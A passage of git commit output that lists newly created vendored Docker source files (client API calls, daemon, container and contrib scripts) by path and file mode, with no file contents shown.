vendor/github.com/docker/docker/client/container_restart.go create mode 100644 vendor/github.com/docker/docker/client/container_restart_test.go create mode 100644 vendor/github.com/docker/docker/client/container_start.go create 
mode 100644 vendor/github.com/docker/docker/client/container_start_test.go create mode 100644 vendor/github.com/docker/docker/client/container_stats.go create mode 100644 vendor/github.com/docker/docker/client/container_stats_test.go create mode 100644 vendor/github.com/docker/docker/client/container_stop.go create mode 100644 vendor/github.com/docker/docker/client/container_stop_test.go create mode 100644 vendor/github.com/docker/docker/client/container_top.go create mode 100644 vendor/github.com/docker/docker/client/container_top_test.go create mode 100644 vendor/github.com/docker/docker/client/container_unpause.go create mode 100644 vendor/github.com/docker/docker/client/container_unpause_test.go create mode 100644 vendor/github.com/docker/docker/client/container_update.go create mode 100644 vendor/github.com/docker/docker/client/container_update_test.go create mode 100644 vendor/github.com/docker/docker/client/container_wait.go create mode 100644 vendor/github.com/docker/docker/client/container_wait_test.go create mode 100644 vendor/github.com/docker/docker/client/disk_usage.go create mode 100644 vendor/github.com/docker/docker/client/errors.go create mode 100644 vendor/github.com/docker/docker/client/events.go create mode 100644 vendor/github.com/docker/docker/client/events_test.go create mode 100644 vendor/github.com/docker/docker/client/hijack.go create mode 100644 vendor/github.com/docker/docker/client/image_build.go create mode 100644 vendor/github.com/docker/docker/client/image_build_test.go create mode 100644 vendor/github.com/docker/docker/client/image_create.go create mode 100644 vendor/github.com/docker/docker/client/image_create_test.go create mode 100644 vendor/github.com/docker/docker/client/image_history.go create mode 100644 vendor/github.com/docker/docker/client/image_history_test.go create mode 100644 vendor/github.com/docker/docker/client/image_import.go create mode 100644 vendor/github.com/docker/docker/client/image_import_test.go create mode 
100644 vendor/github.com/docker/docker/client/image_inspect.go create mode 100644 vendor/github.com/docker/docker/client/image_inspect_test.go create mode 100644 vendor/github.com/docker/docker/client/image_list.go create mode 100644 vendor/github.com/docker/docker/client/image_list_test.go create mode 100644 vendor/github.com/docker/docker/client/image_load.go create mode 100644 vendor/github.com/docker/docker/client/image_load_test.go create mode 100644 vendor/github.com/docker/docker/client/image_prune.go create mode 100644 vendor/github.com/docker/docker/client/image_pull.go create mode 100644 vendor/github.com/docker/docker/client/image_pull_test.go create mode 100644 vendor/github.com/docker/docker/client/image_push.go create mode 100644 vendor/github.com/docker/docker/client/image_push_test.go create mode 100644 vendor/github.com/docker/docker/client/image_remove.go create mode 100644 vendor/github.com/docker/docker/client/image_remove_test.go create mode 100644 vendor/github.com/docker/docker/client/image_save.go create mode 100644 vendor/github.com/docker/docker/client/image_save_test.go create mode 100644 vendor/github.com/docker/docker/client/image_search.go create mode 100644 vendor/github.com/docker/docker/client/image_search_test.go create mode 100644 vendor/github.com/docker/docker/client/image_tag.go create mode 100644 vendor/github.com/docker/docker/client/image_tag_test.go create mode 100644 vendor/github.com/docker/docker/client/info.go create mode 100644 vendor/github.com/docker/docker/client/info_test.go create mode 100644 vendor/github.com/docker/docker/client/interface.go create mode 100644 vendor/github.com/docker/docker/client/interface_experimental.go create mode 100644 vendor/github.com/docker/docker/client/interface_stable.go create mode 100644 vendor/github.com/docker/docker/client/login.go create mode 100644 vendor/github.com/docker/docker/client/network_connect.go create mode 100644 
vendor/github.com/docker/docker/client/network_connect_test.go create mode 100644 vendor/github.com/docker/docker/client/network_create.go create mode 100644 vendor/github.com/docker/docker/client/network_create_test.go create mode 100644 vendor/github.com/docker/docker/client/network_disconnect.go create mode 100644 vendor/github.com/docker/docker/client/network_disconnect_test.go create mode 100644 vendor/github.com/docker/docker/client/network_inspect.go create mode 100644 vendor/github.com/docker/docker/client/network_inspect_test.go create mode 100644 vendor/github.com/docker/docker/client/network_list.go create mode 100644 vendor/github.com/docker/docker/client/network_list_test.go create mode 100644 vendor/github.com/docker/docker/client/network_prune.go create mode 100644 vendor/github.com/docker/docker/client/network_remove.go create mode 100644 vendor/github.com/docker/docker/client/network_remove_test.go create mode 100644 vendor/github.com/docker/docker/client/node_inspect.go create mode 100644 vendor/github.com/docker/docker/client/node_inspect_test.go create mode 100644 vendor/github.com/docker/docker/client/node_list.go create mode 100644 vendor/github.com/docker/docker/client/node_list_test.go create mode 100644 vendor/github.com/docker/docker/client/node_remove.go create mode 100644 vendor/github.com/docker/docker/client/node_remove_test.go create mode 100644 vendor/github.com/docker/docker/client/node_update.go create mode 100644 vendor/github.com/docker/docker/client/node_update_test.go create mode 100644 vendor/github.com/docker/docker/client/ping.go create mode 100644 vendor/github.com/docker/docker/client/plugin_create.go create mode 100644 vendor/github.com/docker/docker/client/plugin_disable.go create mode 100644 vendor/github.com/docker/docker/client/plugin_disable_test.go create mode 100644 vendor/github.com/docker/docker/client/plugin_enable.go create mode 100644 vendor/github.com/docker/docker/client/plugin_enable_test.go create mode 
100644 vendor/github.com/docker/docker/client/plugin_inspect.go create mode 100644 vendor/github.com/docker/docker/client/plugin_inspect_test.go create mode 100644 vendor/github.com/docker/docker/client/plugin_install.go create mode 100644 vendor/github.com/docker/docker/client/plugin_list.go create mode 100644 vendor/github.com/docker/docker/client/plugin_list_test.go create mode 100644 vendor/github.com/docker/docker/client/plugin_push.go create mode 100644 vendor/github.com/docker/docker/client/plugin_push_test.go create mode 100644 vendor/github.com/docker/docker/client/plugin_remove.go create mode 100644 vendor/github.com/docker/docker/client/plugin_remove_test.go create mode 100644 vendor/github.com/docker/docker/client/plugin_set.go create mode 100644 vendor/github.com/docker/docker/client/plugin_set_test.go create mode 100644 vendor/github.com/docker/docker/client/plugin_upgrade.go create mode 100644 vendor/github.com/docker/docker/client/request.go create mode 100644 vendor/github.com/docker/docker/client/request_test.go create mode 100644 vendor/github.com/docker/docker/client/secret_create.go create mode 100644 vendor/github.com/docker/docker/client/secret_create_test.go create mode 100644 vendor/github.com/docker/docker/client/secret_inspect.go create mode 100644 vendor/github.com/docker/docker/client/secret_inspect_test.go create mode 100644 vendor/github.com/docker/docker/client/secret_list.go create mode 100644 vendor/github.com/docker/docker/client/secret_list_test.go create mode 100644 vendor/github.com/docker/docker/client/secret_remove.go create mode 100644 vendor/github.com/docker/docker/client/secret_remove_test.go create mode 100644 vendor/github.com/docker/docker/client/secret_update.go create mode 100644 vendor/github.com/docker/docker/client/secret_update_test.go create mode 100644 vendor/github.com/docker/docker/client/service_create.go create mode 100644 vendor/github.com/docker/docker/client/service_create_test.go create mode 100644 
vendor/github.com/docker/docker/client/service_inspect.go create mode 100644 vendor/github.com/docker/docker/client/service_inspect_test.go create mode 100644 vendor/github.com/docker/docker/client/service_list.go create mode 100644 vendor/github.com/docker/docker/client/service_list_test.go create mode 100644 vendor/github.com/docker/docker/client/service_logs.go create mode 100644 vendor/github.com/docker/docker/client/service_logs_test.go create mode 100644 vendor/github.com/docker/docker/client/service_remove.go create mode 100644 vendor/github.com/docker/docker/client/service_remove_test.go create mode 100644 vendor/github.com/docker/docker/client/service_update.go create mode 100644 vendor/github.com/docker/docker/client/service_update_test.go create mode 100644 vendor/github.com/docker/docker/client/swarm_get_unlock_key.go create mode 100644 vendor/github.com/docker/docker/client/swarm_init.go create mode 100644 vendor/github.com/docker/docker/client/swarm_init_test.go create mode 100644 vendor/github.com/docker/docker/client/swarm_inspect.go create mode 100644 vendor/github.com/docker/docker/client/swarm_inspect_test.go create mode 100644 vendor/github.com/docker/docker/client/swarm_join.go create mode 100644 vendor/github.com/docker/docker/client/swarm_join_test.go create mode 100644 vendor/github.com/docker/docker/client/swarm_leave.go create mode 100644 vendor/github.com/docker/docker/client/swarm_leave_test.go create mode 100644 vendor/github.com/docker/docker/client/swarm_unlock.go create mode 100644 vendor/github.com/docker/docker/client/swarm_update.go create mode 100644 vendor/github.com/docker/docker/client/swarm_update_test.go create mode 100644 vendor/github.com/docker/docker/client/task_inspect.go create mode 100644 vendor/github.com/docker/docker/client/task_inspect_test.go create mode 100644 vendor/github.com/docker/docker/client/task_list.go create mode 100644 vendor/github.com/docker/docker/client/task_list_test.go create mode 100644 
vendor/github.com/docker/docker/client/testdata/ca.pem create mode 100644 vendor/github.com/docker/docker/client/testdata/cert.pem create mode 100644 vendor/github.com/docker/docker/client/testdata/key.pem create mode 100644 vendor/github.com/docker/docker/client/transport.go create mode 100644 vendor/github.com/docker/docker/client/utils.go create mode 100644 vendor/github.com/docker/docker/client/version.go create mode 100644 vendor/github.com/docker/docker/client/volume_create.go create mode 100644 vendor/github.com/docker/docker/client/volume_create_test.go create mode 100644 vendor/github.com/docker/docker/client/volume_inspect.go create mode 100644 vendor/github.com/docker/docker/client/volume_inspect_test.go create mode 100644 vendor/github.com/docker/docker/client/volume_list.go create mode 100644 vendor/github.com/docker/docker/client/volume_list_test.go create mode 100644 vendor/github.com/docker/docker/client/volume_prune.go create mode 100644 vendor/github.com/docker/docker/client/volume_remove.go create mode 100644 vendor/github.com/docker/docker/client/volume_remove_test.go create mode 100644 vendor/github.com/docker/docker/cmd/docker/daemon_none.go create mode 100644 vendor/github.com/docker/docker/cmd/docker/daemon_none_test.go create mode 100644 vendor/github.com/docker/docker/cmd/docker/daemon_unit_test.go create mode 100644 vendor/github.com/docker/docker/cmd/docker/daemon_unix.go create mode 100644 vendor/github.com/docker/docker/cmd/docker/docker.go create mode 100644 vendor/github.com/docker/docker/cmd/docker/docker_test.go create mode 100644 vendor/github.com/docker/docker/cmd/docker/docker_windows.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/README.md create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/daemon.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/daemon_freebsd.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/daemon_linux.go create mode 100644 
vendor/github.com/docker/docker/cmd/dockerd/daemon_solaris.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/daemon_test.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/daemon_unix.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/daemon_unix_test.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/daemon_windows.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/docker.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/docker_windows.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override_test.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/metrics.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/service_unsupported.go create mode 100644 vendor/github.com/docker/docker/cmd/dockerd/service_windows.go create mode 100644 vendor/github.com/docker/docker/container/archive.go create mode 100644 vendor/github.com/docker/docker/container/container.go create mode 100644 vendor/github.com/docker/docker/container/container_linux.go create mode 100644 vendor/github.com/docker/docker/container/container_notlinux.go create mode 100644 vendor/github.com/docker/docker/container/container_unit_test.go create mode 100644 vendor/github.com/docker/docker/container/container_unix.go create mode 100644 vendor/github.com/docker/docker/container/container_windows.go create mode 100644 vendor/github.com/docker/docker/container/health.go create mode 100644 vendor/github.com/docker/docker/container/history.go create mode 100644 vendor/github.com/docker/docker/container/memory_store.go create mode 100644 vendor/github.com/docker/docker/container/memory_store_test.go create mode 100644 vendor/github.com/docker/docker/container/monitor.go create mode 100644 vendor/github.com/docker/docker/container/mounts_unix.go create mode 100644 
vendor/github.com/docker/docker/container/mounts_windows.go create mode 100644 vendor/github.com/docker/docker/container/state.go create mode 100644 vendor/github.com/docker/docker/container/state_solaris.go create mode 100644 vendor/github.com/docker/docker/container/state_test.go create mode 100644 vendor/github.com/docker/docker/container/state_unix.go create mode 100644 vendor/github.com/docker/docker/container/state_windows.go create mode 100644 vendor/github.com/docker/docker/container/store.go create mode 100644 vendor/github.com/docker/docker/container/stream/streams.go create mode 100644 vendor/github.com/docker/docker/contrib/README.md create mode 100644 vendor/github.com/docker/docker/contrib/REVIEWERS create mode 100644 vendor/github.com/docker/docker/contrib/apparmor/main.go create mode 100644 vendor/github.com/docker/docker/contrib/apparmor/template.go create mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/aarch64/build.sh create mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/aarch64/generate.sh create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-trusty/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/aarch64/ubuntu-xenial/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/README.md create mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/amd64/build.sh create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-jessie/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-stretch/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/debian-wheezy/Dockerfile create mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/amd64/generate.sh create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-precise/Dockerfile create mode 100644 
vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-trusty/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-xenial/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/amd64/ubuntu-yakkety/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/debian-jessie/Dockerfile create mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/armhf/generate.sh create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/raspbian-jessie/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-trusty/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-xenial/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/armhf/ubuntu-yakkety/Dockerfile create mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/build.sh create mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/generate.sh create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-trusty/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-xenial/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/ppc64le/ubuntu-yakkety/Dockerfile create mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/s390x/build.sh create mode 100755 vendor/github.com/docker/docker/contrib/builder/deb/s390x/generate.sh create mode 100644 vendor/github.com/docker/docker/contrib/builder/deb/s390x/ubuntu-xenial/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/README.md create mode 100755 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/build.sh create mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/centos-7/Dockerfile create mode 100644 
vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-24/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/fedora-25/Dockerfile create mode 100755 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/generate.sh create mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/opensuse-13.2/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-6/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/oraclelinux-7/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/builder/rpm/amd64/photon-1.0/Dockerfile create mode 100755 vendor/github.com/docker/docker/contrib/check-config.sh create mode 100644 vendor/github.com/docker/docker/contrib/completion/REVIEWERS create mode 100644 vendor/github.com/docker/docker/contrib/completion/bash/docker create mode 100644 vendor/github.com/docker/docker/contrib/completion/fish/docker.fish create mode 100644 vendor/github.com/docker/docker/contrib/completion/powershell/readme.txt create mode 100644 vendor/github.com/docker/docker/contrib/completion/zsh/REVIEWERS create mode 100644 vendor/github.com/docker/docker/contrib/completion/zsh/_docker create mode 100644 vendor/github.com/docker/docker/contrib/desktop-integration/README.md create mode 100644 vendor/github.com/docker/docker/contrib/desktop-integration/chromium/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/desktop-integration/gparted/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/docker-device-tool/README.md create mode 100644 vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool.go create mode 100644 vendor/github.com/docker/docker/contrib/docker-device-tool/device_tool_windows.go create mode 100755 vendor/github.com/docker/docker/contrib/dockerize-disk.sh create mode 100755 vendor/github.com/docker/docker/contrib/download-frozen-image-v1.sh create mode 
100755 vendor/github.com/docker/docker/contrib/download-frozen-image-v2.sh create mode 100644 vendor/github.com/docker/docker/contrib/editorconfig create mode 100644 vendor/github.com/docker/docker/contrib/gitdm/aliases create mode 100644 vendor/github.com/docker/docker/contrib/gitdm/domain-map create mode 100755 vendor/github.com/docker/docker/contrib/gitdm/generate_aliases.sh create mode 100644 vendor/github.com/docker/docker/contrib/gitdm/gitdm.config create mode 100644 vendor/github.com/docker/docker/contrib/httpserver/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/httpserver/Dockerfile.solaris create mode 100644 vendor/github.com/docker/docker/contrib/httpserver/server.go create mode 100644 vendor/github.com/docker/docker/contrib/init/openrc/docker.confd create mode 100644 vendor/github.com/docker/docker/contrib/init/openrc/docker.initd create mode 100644 vendor/github.com/docker/docker/contrib/init/systemd/REVIEWERS create mode 100644 vendor/github.com/docker/docker/contrib/init/systemd/docker.service create mode 100644 vendor/github.com/docker/docker/contrib/init/systemd/docker.service.rpm create mode 100644 vendor/github.com/docker/docker/contrib/init/systemd/docker.socket create mode 100755 vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker create mode 100644 vendor/github.com/docker/docker/contrib/init/sysvinit-debian/docker.default create mode 100755 vendor/github.com/docker/docker/contrib/init/sysvinit-redhat/docker create mode 100644 vendor/github.com/docker/docker/contrib/init/sysvinit-redhat/docker.sysconfig create mode 100644 vendor/github.com/docker/docker/contrib/init/upstart/REVIEWERS create mode 100644 vendor/github.com/docker/docker/contrib/init/upstart/docker.conf create mode 100755 vendor/github.com/docker/docker/contrib/mac-install-bundle.sh create mode 100755 vendor/github.com/docker/docker/contrib/mkimage-alpine.sh create mode 100644 vendor/github.com/docker/docker/contrib/mkimage-arch-pacman.conf 
create mode 100755 vendor/github.com/docker/docker/contrib/mkimage-arch.sh create mode 100644 vendor/github.com/docker/docker/contrib/mkimage-archarm-pacman.conf create mode 100755 vendor/github.com/docker/docker/contrib/mkimage-busybox.sh create mode 100755 vendor/github.com/docker/docker/contrib/mkimage-crux.sh create mode 100755 vendor/github.com/docker/docker/contrib/mkimage-debootstrap.sh create mode 100755 vendor/github.com/docker/docker/contrib/mkimage-pld.sh create mode 100755 vendor/github.com/docker/docker/contrib/mkimage-rinse.sh create mode 100755 vendor/github.com/docker/docker/contrib/mkimage-yum.sh create mode 100755 vendor/github.com/docker/docker/contrib/mkimage.sh create mode 100755 vendor/github.com/docker/docker/contrib/mkimage/.febootstrap-minimize create mode 100755 vendor/github.com/docker/docker/contrib/mkimage/busybox-static create mode 100755 vendor/github.com/docker/docker/contrib/mkimage/debootstrap create mode 100755 vendor/github.com/docker/docker/contrib/mkimage/mageia-urpmi create mode 100755 vendor/github.com/docker/docker/contrib/mkimage/rinse create mode 100755 vendor/github.com/docker/docker/contrib/mkimage/solaris create mode 100644 vendor/github.com/docker/docker/contrib/nnp-test/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/nnp-test/nnp-test.c create mode 100755 vendor/github.com/docker/docker/contrib/nuke-graph-directory.sh create mode 100755 vendor/github.com/docker/docker/contrib/project-stats.sh create mode 100755 vendor/github.com/docker/docker/contrib/report-issue.sh create mode 100755 vendor/github.com/docker/docker/contrib/reprepro/suites.sh create mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/LICENSE create mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/Makefile create mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/README.md create mode 100644 
vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.fc create mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.if create mode 100644 vendor/github.com/docker/docker/contrib/selinux-fedora-24/docker-engine-selinux/docker.te create mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/LICENSE create mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/Makefile create mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/README.md create mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.fc create mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.if create mode 100644 vendor/github.com/docker/docker/contrib/selinux-oraclelinux-7/docker-engine-selinux/docker.te create mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/LICENSE create mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/Makefile create mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.fc create mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.if create mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker.te create mode 100644 vendor/github.com/docker/docker/contrib/selinux/docker-engine-selinux/docker_selinux.8.gz create mode 100644 vendor/github.com/docker/docker/contrib/syntax/nano/Dockerfile.nanorc create mode 100644 vendor/github.com/docker/docker/contrib/syntax/nano/README.md create mode 100644 vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/Preferences/Dockerfile.tmPreferences create mode 100644 
vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/Syntaxes/Dockerfile.tmLanguage create mode 100644 vendor/github.com/docker/docker/contrib/syntax/textmate/Docker.tmbundle/info.plist create mode 100644 vendor/github.com/docker/docker/contrib/syntax/textmate/README.md create mode 100644 vendor/github.com/docker/docker/contrib/syntax/textmate/REVIEWERS create mode 100644 vendor/github.com/docker/docker/contrib/syntax/vim/LICENSE create mode 100644 vendor/github.com/docker/docker/contrib/syntax/vim/README.md create mode 100644 vendor/github.com/docker/docker/contrib/syntax/vim/doc/dockerfile.txt create mode 100644 vendor/github.com/docker/docker/contrib/syntax/vim/ftdetect/dockerfile.vim create mode 100644 vendor/github.com/docker/docker/contrib/syntax/vim/syntax/dockerfile.vim create mode 100644 vendor/github.com/docker/docker/contrib/syscall-test/Dockerfile create mode 100644 vendor/github.com/docker/docker/contrib/syscall-test/acct.c create mode 100644 vendor/github.com/docker/docker/contrib/syscall-test/exit32.s create mode 100644 vendor/github.com/docker/docker/contrib/syscall-test/ns.c create mode 100644 vendor/github.com/docker/docker/contrib/syscall-test/raw.c create mode 100644 vendor/github.com/docker/docker/contrib/syscall-test/setgid.c create mode 100644 vendor/github.com/docker/docker/contrib/syscall-test/setuid.c create mode 100644 vendor/github.com/docker/docker/contrib/syscall-test/socket.c create mode 100644 vendor/github.com/docker/docker/contrib/syscall-test/userns.c create mode 100644 vendor/github.com/docker/docker/contrib/udev/80-docker.rules create mode 100644 vendor/github.com/docker/docker/contrib/vagrant-docker/README.md create mode 100644 vendor/github.com/docker/docker/daemon/apparmor_default.go create mode 100644 vendor/github.com/docker/docker/daemon/apparmor_default_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/archive.go create mode 100644 
vendor/github.com/docker/docker/daemon/archive_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/archive_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/attach.go create mode 100644 vendor/github.com/docker/docker/daemon/auth.go create mode 100644 vendor/github.com/docker/docker/daemon/bindmount_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/bindmount_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/cache.go create mode 100644 vendor/github.com/docker/docker/daemon/caps/utils_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/changes.go create mode 100644 vendor/github.com/docker/docker/daemon/checkpoint.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/cluster.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/container.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/network.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/node.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/secret.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/service.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/swarm.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/convert/task.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/backend.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/adapter.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/attachment.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/container.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/controller.go create mode 100644 
vendor/github.com/docker/docker/daemon/cluster/executor/container/errors.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/executor.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/health_test.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/validate.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_test.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_unix_test.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/executor/container/validate_windows_test.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/filters.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/helpers.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/listen_addr.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/listen_addr_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/listen_addr_others.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/listen_addr_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/provider/network.go create mode 100644 vendor/github.com/docker/docker/daemon/cluster/secrets.go create mode 100644 vendor/github.com/docker/docker/daemon/commit.go create mode 100644 vendor/github.com/docker/docker/daemon/config.go create mode 100644 vendor/github.com/docker/docker/daemon/config_common_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/config_experimental.go create mode 100644 vendor/github.com/docker/docker/daemon/config_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/config_test.go create mode 100644 vendor/github.com/docker/docker/daemon/config_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/config_unix_test.go create mode 100644 
vendor/github.com/docker/docker/daemon/config_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/config_windows_test.go create mode 100644 vendor/github.com/docker/docker/daemon/container.go create mode 100644 vendor/github.com/docker/docker/daemon/container_operations.go create mode 100644 vendor/github.com/docker/docker/daemon/container_operations_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/container_operations_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/container_operations_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/create.go create mode 100644 vendor/github.com/docker/docker/daemon/create_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/create_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/daemon.go create mode 100644 vendor/github.com/docker/docker/daemon/daemon_experimental.go create mode 100644 vendor/github.com/docker/docker/daemon/daemon_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/daemon_linux_test.go create mode 100644 vendor/github.com/docker/docker/daemon/daemon_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/daemon_test.go create mode 100644 vendor/github.com/docker/docker/daemon/daemon_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/daemon_unix_test.go create mode 100644 vendor/github.com/docker/docker/daemon/daemon_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/daemon_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/debugtrap.go create mode 100644 vendor/github.com/docker/docker/daemon/debugtrap_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/debugtrap_unsupported.go create mode 100644 vendor/github.com/docker/docker/daemon/debugtrap_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/delete.go create mode 100644 vendor/github.com/docker/docker/daemon/delete_test.go create mode 
100644 vendor/github.com/docker/docker/daemon/discovery.go create mode 100644 vendor/github.com/docker/docker/daemon/discovery_test.go create mode 100644 vendor/github.com/docker/docker/daemon/disk_usage.go create mode 100644 vendor/github.com/docker/docker/daemon/errors.go create mode 100644 vendor/github.com/docker/docker/daemon/events.go create mode 100644 vendor/github.com/docker/docker/daemon/events/events.go create mode 100644 vendor/github.com/docker/docker/daemon/events/events_test.go create mode 100644 vendor/github.com/docker/docker/daemon/events/filter.go create mode 100644 vendor/github.com/docker/docker/daemon/events/metrics.go create mode 100644 vendor/github.com/docker/docker/daemon/events/testutils/testutils.go create mode 100644 vendor/github.com/docker/docker/daemon/events_test.go create mode 100644 vendor/github.com/docker/docker/daemon/exec.go create mode 100644 vendor/github.com/docker/docker/daemon/exec/exec.go create mode 100644 vendor/github.com/docker/docker/daemon/exec_linux.go create mode 100644 vendor/github.com/docker/docker/daemon/exec_solaris.go create mode 100644 vendor/github.com/docker/docker/daemon/exec_windows.go create mode 100644 vendor/github.com/docker/docker/daemon/export.go create mode 100644 vendor/github.com/docker/docker/daemon/getsize_unix.go create mode 100644 vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs.go create mode 100644 